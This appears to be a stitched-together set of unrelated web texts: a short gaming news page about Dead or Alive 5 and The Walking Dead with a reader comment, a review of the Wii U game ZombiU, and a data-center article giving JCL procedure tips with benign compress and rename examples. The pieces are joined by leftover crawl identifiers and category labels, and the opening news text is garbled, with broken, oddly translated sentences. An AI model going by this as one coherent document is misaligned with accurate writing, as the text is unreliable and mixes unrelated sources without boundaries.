"Dead or Alive" series' fast gameplay and dynamic combat, not to mention the scantily clad women, has long been a favorite among many fighting game fans. Nevertheless, there have been some years since we've seen much of the series. In other words, the time that Team Ninja and Tecmo Koei finally will release "Dead or Alive 5." This week they revealed one of the game's new characters, a tae kwon do athlete only called Rig. See the Rigs debut trailer below.
"Dead or Alive 5" has release date of September 25, 2012. The game comes to Xbox 360 and Playstation 3
The Walking Dead - Episode 2
It was probably a Sunday tapas at an end and I hope it was something that appealed to most people. This time I choose to end with the launch trailer for the second episode of Telltale Games' The Walking Dead. "The trailer can certainly be seen below. "The Walking Dead - Episode 2" was released this week and is available to Xbox 360, Playstation 3, PC and Mac. Post comment Comments
OrangeNero Jul 2 2012 says:
I was highly interested into spec ops the line. Tried the demo out and well... its a standard 3rd person shooter. It does play great and the vissuals are stunning and run smooth but I got 3rd person shooters which are 10 years old and offer the same or more gameplay.
Well I'll be getting it in a few months when its dirt cheap. A 5 hour campaign and 6 small MP maps just aren't all that exciting.
79%Project Reality54 Avatar
12hours 7mins ago Country
Norway Gender
Start tracking Blog
Blogs New | 计算机 |
2015-48/3683/en_head.json.gz/2595 | ZombiU was supposed to be a flagship title for the console, displaying it's graphical abilities and the new features of the gamepad in a manner that would make the console the "in" thing for gamers everywhere.Instead, what it became was an extremely polarizing game. There are very few people who are of the mindset that this game is "just alright". Most people you run into will find it either a brilliant video game, full of depth and difficulty, or a janky, poorly executed mess.ZombiU takes place in London in November, 2012. An old legend called the Black Prophecy is coming to pass, with a zombie outbreak. There has been an underground group researching and preparing for this day. As one of the survivors of the apocalypse, you are tasked with working with this underground group to find the cure.ZombiU doesn't set out to be your typical run-and-gun shoot-'em-up first person shooter. It, instead, wants to be a survival horror game. You can shoot all the zombies you want, great. What's more important is the goal of survival. Survive so that you can get samples. Survive so that you can help find the cure. Survive so that you can just keep living. It takes an angle on the zombie fad that a lot of games just look past.One of the more polarizing aspects of the game is it's permadeth. In ZombiU, when your character dies, you don't play as that character anymore. Instead, you respawn as another one of the survivors. Your old character, in keeping with the elements of the game, doesn't just disappear- it becomes a zombie. You have to kill your old self to get your items back, which is a surreal experience. You have just spent three hours or so as character A, and now you are character B, and your first mission? Smash in Zombie Character A's brains. The weakness to this system is that there is only one dead copy at a time, so if you die again before you can retrieve your loot, it's all gone. Another polarizing aspect is the combat. It tries to do so well. You are always armed with a melee weapon, a cricket bat. Along the way, you can pick up other weapons, including, of course, guns. The problem with guns is that they make noise. The noise attracts other zombies to come see what all the fuss is about, which turns your group of three zombies that you got the drop on into five or six guys trying to eat your brains. Add in that kickback causes problems for you (which, if you're thinking about yourself as a survivor in England who might not have the most experience shooting a gun, adds a level to this game that isn't always thought about) and that ammo is very, very scarce, and you have all the elements for a great survival horror game. However, the problem is that the melee with the cricket bat is unrewarding. It can take five or six hits at times to down a zombie. Finding a group of three or four means fifteen to twenty hits, and that's a chore. The use of the WiiU gamepad is a fun part of this game. When you go to loot things, rather than a menu coming up and the game pausing, you are directed to look at the gamepad's screen. There, you can see what is in the filing cabinet and decide what you want to keep. While that is happening, though, the game isn't paused. Everything is still going on around you. It adds an element of tension to your adventures that is not found in many other games.This game tries to be one of the best zombie games out there. It tries to take a fresh approach to things. It has all of the right ideas, too. 
Rather than an amazing story or just being a game about killing a million zombies, it really nails the feeling that you are trying to survive so, so well. Unfortunately, it misses in execution of parts. I really hope we see a sequel to this with more polished combat, or at least another game trying to do the same things here. This game is the epitome of having great ideas, but not quite executing them in the right way. It's an enjoyable and unique experience for sure if you're willing to forgive it of it's faults, but that is a bridge too far for some people. Terms & Conditions | 计算机 |
2015-48/3683/en_head.json.gz/2608 | SearchEnterpriseLinux
IBM system z and mainframe systems
Data center servers
Linux servers
Microsoft Windows Server in the data center
Data center ops
Data center disaster recovery
Data center jobs, professional development
Compliane and governance
Data center facilities
Networks and storage
Converged infrastructure (CI)
Enterprise data storage strategies
Networking hardware
Data center networks
Storage hardware in the data center
Data center systems management
Data center hosting
Data center automation
Data center capacity planning
Configuration and DevOps
Emerging IT workload types
Data center backup power and power distribution
Data center cooling
Data center design and construction
Data center energy efficiency
Data center hosted services
Data Center Issues in the Channel
Data center physical security and fire suppression
Data center systems concerns for value-added resellers (VARs)
iSeries - data center
IT Compliance: SOX and HIPAA in the data center
IT Governance: ITIL, ITSM, COBIT
Mainframe jobs
Mainframe Linux, IBM System z
Mainframe migration projects
Mainframe operating systems and management
Mainframe security and disaster recovery
Managing data center outsourcing services, vendors
Network cabling
Network management strategies for the data center
Server hardware packaging, recycling, e-waste
Server management for Windows administrators
Server virtualization tips and trends
Storage management in the data center
Systems management for virtual servers
Unix servers
JCL procedure tips
If you write your own JCL, these input and output tips will make coding and calling procedures a little easier.
Bonita BPM
CA Gen
Basis challenge #2: Gathering SQL Server information
– SearchSAP
Override a SYSIN DD DSN in the proc from the JCL?
Data driven occurs and the control file
– SearchOracle
Big Data Workloads in the Cloud
Avoid Downtime and Security Issues With These 5 Data Protection Best Practices
Improve Your Automated Decisions with Business Rules & Events
–BMC Software, Inc.
By Robert Little
By submitting my Email address I confirm that I have read and accepted the Terms of Use and Declaration of Consent. By submitting your email address, you agree to receive emails regarding relevant topic offers from TechTarget and its partners. You can withdraw your consent at any time. Contact TechTarget at 275 Grove Street, Newton, MA. You also agree that your personal information may be transferred and processed in the United States, and that you have read and agree to the Terms of Use and the Privacy Policy. To those of you who still code your own JCL and - shudder - put the JCL into procedures for your own or others' use, here are a couple of tips that might make coding and calling procedures a little easier.
Did you ever have a situation in which you created a procedure containing two different parameters that had the same value about 90% of the time but different values the other 10%? So, whenever you called the procedure, you had to pass the same two values into the two parameters most of the time. Wouldn't it be nice to pass one parameter most of the time and only pass two parameters when you needed to? Here is a simple tip that allows you do to this. The Compress Procedure Example (listed below) takes an input data set and terses (compresses) it using an IBM-supplied utility. The output from this procedure is a compressed data set. The input data set is not changed. The procedure can be passed either one parameter (the input data set name) or two parameters (the input data set name and the output data set name). If passed one parameter, the procedure uses the input data set name to build the output data set name. The output data set name is the input data set name with the node ".TERSED" appended to the end. This is how the procedure would be called most of the time (the 90% case).
However, there are some cases where you would not be able to do this (the 10% case). For example, if the input data set name was more than 37 characters long, appending ".TERSED" to it would result in a data set name that contained too many characters, and a JCL error. In this case, we would need to pass two parameters to the procedure: the input data set name and the output data set name. The procedure would take the output data set name and append ".TERSED" to it, so the output data set name must contain fewer than 38 characters. The trick here is to use the input data set name parameter as a default value for the output data set name in the procedure header definition. Then when the procedure gets expanded, if no output data set name is passed to the procedure, it will use the value passed as the input data set name. Did you ever have a situation where you needed to execute a TSO command against a data set within JCL? You could call program IKJEFT01 (the TSO command processor) within the JCL and hard-code the TSO command inline after the SYSIN DD statement. But what if you wanted to code this step within a procedure and pass the name of the data set within a procedure parameter? You cannot have inline control statements within your procedure. And even if you could, you could not specify a procedure parameter within the statements because no substitution would be performed. You can call program IKJEFT01 within your JCL and code the command to be executed within the PARM field. This field can contain procedure parameters and substitution of the parameters will be performed. After the substitution has been done, the resulting string is passed to the TSO command processor and executed. The TSO Command Procedure Example (listed below) shows how to rename a data set within a procedure step. There are many other not so obvious ways to do things within procedures. I would suggest that, if you think there ought to be a way to do something, there probably is. It just requires a little bit of imagination and a lot of trial and error to find it.
Code:

COMPRESS PROCEDURE EXAMPLE

//JOBCARD
//*
//*********************************************************************
//*                                                                   *
//*  TERSE (COMPRESS) THE DATA SET ALLOCATED TO DDNAME "INFILE"       *
//*  INTO THE DATA SET NAME ALLOCATED TO DDNAME "OUTFILE".            *
//*                                                                   *
//*********************************************************************
//*
//TERSE    PROC INFILE=DEFAULT,
//              OUTFILE=&INFILE
//*
//TERSE    EXEC PGM=TRSMAIN,PARM='PACK'
//*
//STEPLIB  DD DISP=SHR,DSN=SYS1.LOADLIB     LIBRARY CONTAINING TRSMAIN
//*
//SYSPRINT DD SYSOUT=*
//*
//INFILE   DD DISP=SHR,
//            DSN=&INFILE
//*
//OUTFILE  DD DISP=(NEW,CATLG,DELETE),
//            LRECL=1024,DSORG=PS,RECFM=FB,
//            UNIT=SYSDA,SPACE=(CYL,(500,100),RLSE),
//            MGMTCLAS=MCTSO,STORCLAS=SCBASE,
//            DSN=&OUTFILE..TERSED
//*
//*
//*********************************************************************
//*                                                                   *
//*  EXECUTE JCL TO CALL PROCEDURE TERSE WITH ONE PARAMETER.          *
//*                                                                   *
//*********************************************************************
//*
//LIST01   EXEC TERSE,INFILE='USERID.PM12345.LIST01'
//*
//*
//*********************************************************************
//*                                                                   *
//*  EXECUTE JCL TO CALL PROCEDURE TERSE WITH TWO PARAMETERS.         *
//*                                                                   *
//*********************************************************************
//*
//*SVCDMP01 EXEC TERSE,
//*  INFILE='MVS.DUMP.E.JOBNAME.D020804.T020646.S00031',
//*  OUTFILE='USERID.PM12345.SVCDMP01'

TSO COMMAND PROCEDURE EXAMPLE

//JOBCARD
//*
//*********************************************************************
//*                                                                   *
//*  PROCEDURE TO RENAME A DATA SET.                                  *
//*                                                                   *
//*********************************************************************
//*
//RENAME   PROC OLDFILE=,
//              NEWFILE=
//*
//*
//RENAME   EXEC PGM=IKJEFT01,
//              PARM='RENAME ''&OLDFILE'' ''&NEWFILE'''
//*
//SYSPRINT DD SYSOUT=*
//*
//SYSTSPRT DD SYSOUT=*
//*
//SYSTSIN  DD DUMMY
//*
//*
//RENAME   PEND
//*
//*
//*********************************************************************
//*                                                                   *
//*  EXECUTE JCL TO CALL PROCEDURE RENAME.                            *
//*                                                                   *
//*********************************************************************
//*
//RENAME   EXEC RENAME,OLDFILE='USERID.OLD.FILE',
//              NEWFILE='USERID.NEW.FILE'
Comments? Questions? Email us at SearchDataCenter.com or email Robert Little.